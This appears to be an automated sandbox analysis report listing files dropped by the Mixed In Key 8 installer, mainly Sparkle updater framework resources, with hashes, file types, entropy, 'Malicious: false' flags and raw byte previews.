SHA-512:	4EB075E1C9BBAA9D8E47908029ECBE8A0B2E9402EEDAFA77FD71746F1046B68A937ECA96E2D724016334ACC0A1563235DA459B24C9DC5AC7D6F384216DACF8B0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>ADP2,1</key>..<string>Developer Transition Kit</string>..<key>iMac1,1</key>..<string>iMac G3 (Rev A-D)</string>..<key>iMac4,1</key>..<string>iMac (Core Duo)</string>..<key>iMac4,2</key>..<string>iMac for Education (17-inch, Core Duo)</string>..<key>iMac5,1</key>..<string>iMac (Core 2 Duo, 17 or 20 inch, SuperDrive)</string>..<key>iMac5,2</key>..<string>iMac (Core 2 Duo, 17 inch, Combo Drive)</string>..<key>iMac6,1</key>..<string>iMac (Core 2 Duo, 24 inch, SuperDrive)</string>..<key>iMac8,1</key>..<string>iMac (April 2008)</string>..<key>MacBook1,1</key>..<string>MacBook (Core Duo)</string>..<key>MacBook2,1</key>..<string>MacBook (Core 2 Duo)</string>..<key>MacBook4,1</key>..<string>MacBook (Core 2 Duo Feb 2008)</string>..<key>MacBookAir1,1</key>..<string>MacBook Air (January 2008)</string>..<key>MacBookAir2,1</k

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_mpdGnd Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11630
Entropy (8bit):	6.73082339431031
Encrypted:	false
SSDEEP:	192:S1WHfgv3Pl0k6OXkE0lbjeEYNMtKwEgI3Bp/XOdHyuu8uMwkB32Bp1:SgHfafl0k6akE05eEYNg7EgI3BpmdHy/
MD5:	984722CB755E148570586FF148177FE8
SHA1:	B18B31FB225D93B5398E5693E548E46003B6BD86
SHA-256:	C5E5602B154E2A0AE88B5885DBBBD4F678F1CB2CE26E1049720C13F8462AEFEA
SHA-512:	25D7510BD8F2B184CD6B7E9EEA3780F544E69F662E735BDBD691D4A066207D65B9AC80879DAB3811964A6D9CB2D65357E5B526A19779A156417C449FF640BE26
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.@.H.^.f.i.m.n.o...........................................................................(.../.0.3.6.9.C.D.N.O.S.T.^._.`.i.p.t.x.\|.....................................................................................................!.".$.3.N.....f.i.j.[.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.{.\|.}....U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.......~.z.............. ...!."[NSClassName...._..SUStatusController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.?..4.5.6.7.8.9.:.;.<.=.>..... .[.`.g.k.o.r.t.w....A.B.C.....E.F.GXNSSource]NSDestinationWNSLabel..........I.J.K.L...M.N.O.P.Q.R.S.T.U.V.W.X.Y.Y.[.\.]VNSCellWNSFrame_..NSAllowsLogicalLayoutDirect

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_zmBX5I Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1234
Entropy (8bit):	5.180058186355181
Encrypted:	false
SSDEEP:	24:2dfyiwBVw6wEjArMa6X42RbC0gp/y2PgCGexwMZhGt0b:cfyfVQEjArcXjM0g02ICGcwcGt0b
MD5:	00AF74FF5A6DE3F053F5CB6D3B423000
SHA1:	6135EA9D586BB3683E5ABE41FB36775B828A99E1
SHA-256:	892445137567A502BD134680082EDACE7FCFA05D957FD161B3572DE1169C87C5
SHA-512:	2C062E1E2651D4CD1A89085B738D286501C81E63F53D6640538594980865DC8E41024EBE3AE6992719FFA7BFE615C1B3215A49A56F55379ABE96179921172016
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>en</string>..<key>CFBundleExecutable</key>..<string>Sparkle</string>..<key>CFBundleIdentifier</key>..<string>org.andymatuschak.Sparkle</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>Sparkle</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.6 git</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>046b35c</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</ke

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/.BC.T_W3QRFO Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	1.75
Encrypted:	false
SSDEEP:	3:k0Ra:f8
MD5:	23B7D7D024ABB0F558420E098800BF27
SHA1:	9F9EEA0CFE2D65F2C3D6B092E375B40782D08F31
SHA-256:	82502191C9484B04D685374F9879A0066069C49B8ACAE7A04B01D38D07E8ECA0
SHA-512:	F77D501528DD0CED155C80406CFBEE38D5D3649B64D2A9324F3D6CEE39491EB8F54CDEBAE49C6E21A20D2309D8FAE1B01C41631224811E73483DB25A2695738C
Malicious:	false
Preview:	APPL????

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/.BC.T_XtQ91r Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1514
Entropy (8bit):	5.131381869858746
Encrypted:	false
SSDEEP:	24:2dfyiwBVw6NuXbj0Ma64oR60gp/g2PgCGexwMZhGt0G9H/fedFHrGuh:cfyfVtuXbj0c1M0gy2ICGcwcGt0G9HOB
MD5:	327891A0C12C865E4533B1468092F6C8
SHA1:	3BDD84609A6C9B2455F7681AA07234E5252EE18C
SHA-256:	E092DCAA8DCDABA9ACDC861F77F1C2C252055B8BDA3B120A76AE0891395D5BF8
SHA-512:	7103096A1639BABD99F0DC2BFE13898C20417C4EEC548B95CCC2B6103188B9E8624C6D96ACBD409079821467EE8F68AF2FC80A2EBFB9C325FE5589E64FCA1F4B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>Autoupdate</string>..<key>CFBundleIconFile</key>..<string>Sparkle</string>..<key>CFBundleIdentifier</key>..<string>org.andymatuschak.sparkle.Autoupdate</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundlePackageType</key>..<string>APPL</string>..<key>CFBundleShortVersionString</key>..<string>1.6</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1.6</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlat

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/MacOS/.BC.T_KWbM0U Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Category:	dropped
Size (bytes):	119344
Entropy (8bit):	5.440116133145609
Encrypted:	false
SSDEEP:	1536:E82/KMQUj+0Wz3FMghOmYpSymhy2i5LvgOV9ZZ3/X4wD4K:E8waRFTO50hy2i5LIOV9ZZ5U
MD5:	708B915A9231D75036F982EB7E75B1F2
SHA1:	A4BC3FA949507E4B9AD7167C084004C07E281AA3
SHA-256:	0A516B5F43D093873A82B1E6D02C3995B69C8344290B84385E7491916540EA89
SHA-512:	92822D047B40B26A8A14BF44922B8AC2044FD117A725C7D3A0402074E1F87B99D348C76CEAA487256841D2A205B345C5AE5835439D62D9D5F44378D43A89F2F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Mixed In Key 8.dmg, Detection: malicious, Browse
Preview:	.......................... .........H...__PAGEZERO..............................................................__TEXT..........................................................__text..........__TEXT..........@.......Vw......@...............................__stubs.........__TEXT..................4.......................................__stub_helper...__TEXT........................................................__const.........__TEXT..................@.......................................__objc_methname.__TEXT.................#......................................__cstring.......__TEXT........................................................__objc_classname__TEXT..........................................................__objc_methtype.__TEXT..........................................................__gcc_except_tab__TEXT..........................................................__unwind_info...__TEXT..........l...............l...............................__eh_frame......__TEXT..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/.BC.T_mRVoBE Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11630
Entropy (8bit):	6.73082339431031
Encrypted:	false
SSDEEP:	192:S1WHfgv3Pl0k6OXkE0lbjeEYNMtKwEgI3Bp/XOdHyuu8uMwkB32Bp1:SgHfafl0k6akE05eEYNg7EgI3BpmdHy/
MD5:	984722CB755E148570586FF148177FE8
SHA1:	B18B31FB225D93B5398E5693E548E46003B6BD86
SHA-256:	C5E5602B154E2A0AE88B5885DBBBD4F678F1CB2CE26E1049720C13F8462AEFEA
SHA-512:	25D7510BD8F2B184CD6B7E9EEA3780F544E69F662E735BDBD691D4A066207D65B9AC80879DAB3811964A6D9CB2D65357E5B526A19779A156417C449FF640BE26
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.@.H.^.f.i.m.n.o...........................................................................(.../.0.3.6.9.C.D.N.O.S.T.^._.`.i.p.t.x.\|.....................................................................................................!.".$.3.N.....f.i.j.[.k.l.m.n.o.p.q.r.s.t.u.v.w.x.y.z.{.\|.}....U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.......~.z.............. ...!."[NSClassName...._..SUStatusController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.?..4.5.6.7.8.9.:.;.<.=.>..... .[.`.g.k.o.r.t.w....A.B.C.....E.F.GXNSSource]NSDestinationWNSLabel..........I.J.K.L...M.N.O.P.Q.R.S.T.U.V.W.X.Y.Y.[.\.]VNSCellWNSFrame_..NSAllowsLogicalLayoutDirect

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/.BC.T_x9fPaE Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mac OS X icon, 41403 bytes, "is32" type
Category:	dropped
Size (bytes):	41403
Entropy (8bit):	7.887999665341449
Encrypted:	false
SSDEEP:	768:R4uO+MUks0YyGtGewLDcaAWSFwsmxziSjZVOupAwl/Ooc8WUK7c7WQ9tM:etLPywsuOSDmu/Ooc/pmW6tM
MD5:	80BC51F3EC405DF93F59D53264066310
SHA1:	4403E2D460E6ED18C0F8994E4950F57982BED550
SHA-256:	D3BDF012983D7F5F40414815C3AFBB35C740D6151D628E17D7BA51491B319DBE
SHA-512:	C14587C4E55D2C50F1B66AE47692A373D807C6A5EB0D2E6F5D439B979101FEF1327502A69EA0B973894D80F2DD9812C080DF1522195B99E84542E80F20325DC7
Malicious:	false
Preview:	icns....is32.......+ERRE+....+a.....e).../........./..T)............)..a....ee.....e.#....nz..zn....):.............:E.............EE............D:.......4....:#.............W..........P.. ........... ..."........."... P.....P .....098/........+ERRE+....+a.....e).../........./..T)............)..a....ee.....e.#....nz..zn....):.............:E.............EE............D:.......4....:#.............W..........P.. ........... ..."........."... P.....P .....098/........+ERRE+....+a.....e).../........./..T)............)..a....ee.....e.#....oz..zo....):.............:E.............EE............D:.......4....:#.............W..........P.. ........... ..."........."... P.....P .....098/....s8mk.................................................................................................................................................................................................................................................................il3

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ar.lproj/.BC.T_7cZrNQ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4602
Entropy (8bit):	5.263034756225517
Encrypted:	false
SSDEEP:	96:PQy6HaagalWRNLhuWLIEGsKSLP0VKQjAkFto4lt155Q3HaWUZP:vcaagKWRNLhnLJFL8DS4lDg35UP
MD5:	70B63D2A826BE40731A075A87C47F03F
SHA1:	DE53799AC32B9CC2BD16E6DFD36605E72C8AA7B5
SHA-256:	8C94A102BD24971BF312D36BEBC3CD67DA6328EC257CF0F59E275B2548CA4E5D
SHA-512:	AE52D660429F0891DC050467353A06403785CBDB2A0FA913A9E83463EE905E6083EBF0F042A2E2E0948DE45E55C8136F7C71E73D9C88431107B4BA3507DF8F83
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " .... .... .1%@$% $2 @..... ... ............. . ....... ..... .......... ..... .......% $1 @......;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " .... ... .......% $1 @..... .... ..... ... ........ ...... ...... .... ...... . ....... ...... ......... ......% $1 @..... ... ............ ... ......... . ....... . ....... .......;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " ........% $2 @.... ... ........ .... ......... ..... .1%@$;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =."... .........% $3 @.... .... .1%@$... . ....

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ca.lproj/.BC.T_CuBFmS Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2830
Entropy (8bit):	4.824854318221833
Encrypted:	false
SSDEEP:	48:Lctr7vlMFYvsDC9/WI9347Vut8m/bWnDQ4AildjiLk2nXjiLtRlqbaVfZgW0Db3c:LctuuUD/I1t8mjWnDQ4AId2LpnX2Ltnr
MD5:	9F1ABCCE61E95FCAE31FB24A85033AB6
SHA1:	EBFB357848D6657B8BDA738D8FF7BE1814298303
SHA-256:	60BABDFAC90136E17B9994D2A835BC95031093BA62A1C743B5F63F0A3405522F
SHA-512:	2552AF5F9B175CACABE0F2970D1B579353215D3A0E55AFFE427338F36E4B015C63EA9EFBC85386D3895F8E3EB8399644B901E39FB933EF59106400B9F0442D6A
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$d e2%@$;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aidksi ameg .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn hti ,na drt ygaia.n " =%"$1 @one sop tcautlatiaz ruqnaf nuicno aed s'dnud si c'dmitaeg .oMev u1%@$a lovtserd riceotirA lpcicaoisn ,erniciei-uol , iotnruea p orav-roh"..;".@%% @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e@%s attr!sW uodly uol ki eotr leuacn hon?w " =%" @@%h aseat tnitsla..al t iseat.r .llse tep r aes rtulitiaz talp oreparv geda auq e'snici.i .@% !oVel uerniciai rra?a;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " @%% @.. salv reis..d siopinlb e.ms.a tcau.l;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " @%% @se.t .idpsnobiel( ra aetin u@%.)V louea tcauilztra"?.;".@%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p " =%" @ont ..p re.ms.p ree csirru elad riceotird a'lpcicaoisn !sE

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cs.lproj/.BC.T_PBJxHJ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3480
Entropy (8bit):	5.1493807547320705
Encrypted:	false
SSDEEP:	96:PgVCXD6uKrvOIS7TiAIjLhu/mLaLJOCpnfLP4dvlY95kJ79BN:pDBgvOIS7OjLhImLaLcCZLAjj79BN
MD5:	689382B6730CEFDEBD3AA07DF8B4A181
SHA1:	EC6E96BBCD6BF225F026D84B7297CEB16CAD1C16
SHA-256:	B6D274FDDD401FFC6DEE2A77AEF84562B4F50BE6BC190F287031F7335C9F8FFB
SHA-512:	0DF3228ADBCC096FE42C780FF164E65213A28E4E66F86C8064ED65CDDD49B769F9780AB48039FBEC2980A3738C428C78169FDBB98343FA08837715C56D445D02
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @yb lnitslavo.. n.aj. e.pi.rpvanek ..op.ui..t .opp .....tm.s up...tn... ..Pe.ejets ipailakic% $1 @yn.n .annitslavotaa ..nzvo upssuit?t;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " pAilakec% $1 @en.m.e.b .. tkautlazivo..an ,rpto.oe.j eps.ut...anz n zepasivotale.nh. o.md.ai ..M.e.t o.bt.C /DVD-DOR,Mo rbzad siukn be oej nen.mt. erp..ovz ..ipusn aidks ..Pe.us..eta lpkica i1%@$d oav...s ol..ykA lpkica,es up.st. eijz t hoto omu..ts..inz onuv"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$j eennjvo...j. .odtspu.n .evzr"e.;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " eJk d siopizic% $1 @2%@$- m ..et% $3.@P ..jete eisn ny..z ok.pr.votaa tkauilazic"?.;".@%d wolnaoed"d= " kz

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/cy.lproj/.BC.T_oCTfAy Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2424
Entropy (8bit):	4.717127628221706
Encrypted:	false
SSDEEP:	48:LwIFT9+2I6xBb3CQcLgeUiYRIRALkHLk3LtRySGRJX+kK0:LLK2ImHjlRIRALiLuLtkSGjX+i
MD5:	FC3EA6E0077DA6182BBE7CC2FFCA1236
SHA1:	28DF08B4E8E111F7F02CA03F3157E2372A80C720
SHA-256:	2135CF24F1C452FDEFB06C5D7051ACDF4F368D1D16B114BC085BEFC089785D31
SHA-512:	5F7E6D12914D8F832487357716993C76D7130445FE800A7EF9E889BAFD86999E4F3D39DEEE11CBB2F4D83EAF936A47EE073CFFF7FA6FB1AA09CDEA90A2BDECA9
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e3%@$s attr!sW uodly uol ki eotr leuacn hon?w;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @sin woa avlibael( oy uahev% $3)@ .oWlu doy uilekt oodnwoldai ton?w;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =A"n wev reisnoo f@%h sab ee nnitslael!d;"..A"n wev reisnoo f@%i svaiaallb!e " =A"n wev reisnoo f@%i svaiaallb!e;"..A" n

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/da.lproj/.BC.T_dJnfDr Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3656
Entropy (8bit):	4.828274685627281
Encrypted:	false
SSDEEP:	96:PDhNOYwRFzTLhuras8n+LvLPqr6Nw+hfFIo4lp1Ruqf57y:bhNPwRFzTLh9+LvLSG4lvIQy
MD5:	69B7C9EBCFB043EE4647310C2DF9F853
SHA1:	5B21F99F4F0492303EBEDFDF725F4FBA74A95E6C
SHA-256:	9A630D799DE61271D8E903D22A97265DA9F61B43D41D749CF03080A9A4CD0227
SHA-512:	0420A45902C10E12DF013C0A0EB0C2E059E9710B47A82F82013A578D7968DCCDA8727BFA6878778A94D5A6070BBFF96D0F4B1B7791B7BE91FE029738A882739A
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @reh neet tgok al rit lrbgu !iV ludi snatllre egog netsraet% $1 @un"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @ak nkieko dptaresen .. red t.kr.sef are nuk n.ls.ab rneeh.dF yl t1%@$t lim paep nrPgoarmmre ,egsnattrd rerf agop .rv.i eg.n;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @red nea tkeull eevsroi.n;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e ritgl..gnlegi !uDh ra% $3.@S ak led nehtnsen ?u;"..%" @odnwoldade " =%" @ehtnte;"..%" @fo% "@= " 1%@$a f2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =E" nynv reisnoa f@%e ritgl..gnlegi"!.;". Aen wevsroi nfo% @sir aeydt onitsla!l " =E" nynv reisnoa f@%e rlkrat lii snatllreni!g;"..A" nreor rcoucrrdei n

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/de.lproj/.BC.T_gXl5kc Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3674
Entropy (8bit):	4.847547878248266
Encrypted:	false
SSDEEP:	96:PoLx3vhmNmVOAoqLhuxqLuRQqLJOb0qLhmL2zE6qL9o7Vy21J5R:w13vhmNxqLheqLLqLcb0qLhmabF7oS
MD5:	A1EB1385AD11092F71BA5FF256F0CEDC
SHA1:	A8DECBC94F5C531A7A37C54875961CDF7DF93F9B
SHA-256:	1F4B5B48B961337D1604691A88FDBF1B149F60E0E33E0A54A8E1D6E27938526C
SHA-512:	093237B75CAD280097AC304C28384F6D7CAC792800CE80D6C562235F69D84889072C5D1D37DCBC2058C7C858315EE0D5DC0B480A4267598D9B1BDA06B2B3CCC0
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @uwdr eehurtnreegaled nnu dtshe tuz reVwrneudgnb reie!tM ..hcet niS e1%@$j tetzd ruhcd ein ue eeVsroi nreesztneu dnn ues attrne"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @aknnn citha tkauilisre tewdrne ,ewnne sov nieen moVulem nhoenS hcerbiuzrgfi fz(B. .iDksI amego ed rDCD/DV )egtsraet tuwdr.eK poeier niS e1%@$i ned nrPgoarmm erOndre ,kautlasieier niS esev nod ro.t;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @si tuz reZtid ein ueseetv re.fg.aberV reisno"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @si tevfr..bgra( iS eevwrneed neVsroi n3%@$.)M ..hcet niS eid eeneuV reisnoj tetzh renuetlrdane"?.;".@%d wolnaoed"d= " @%h renuetgrledane;"..%" @fo% "@= " 1%

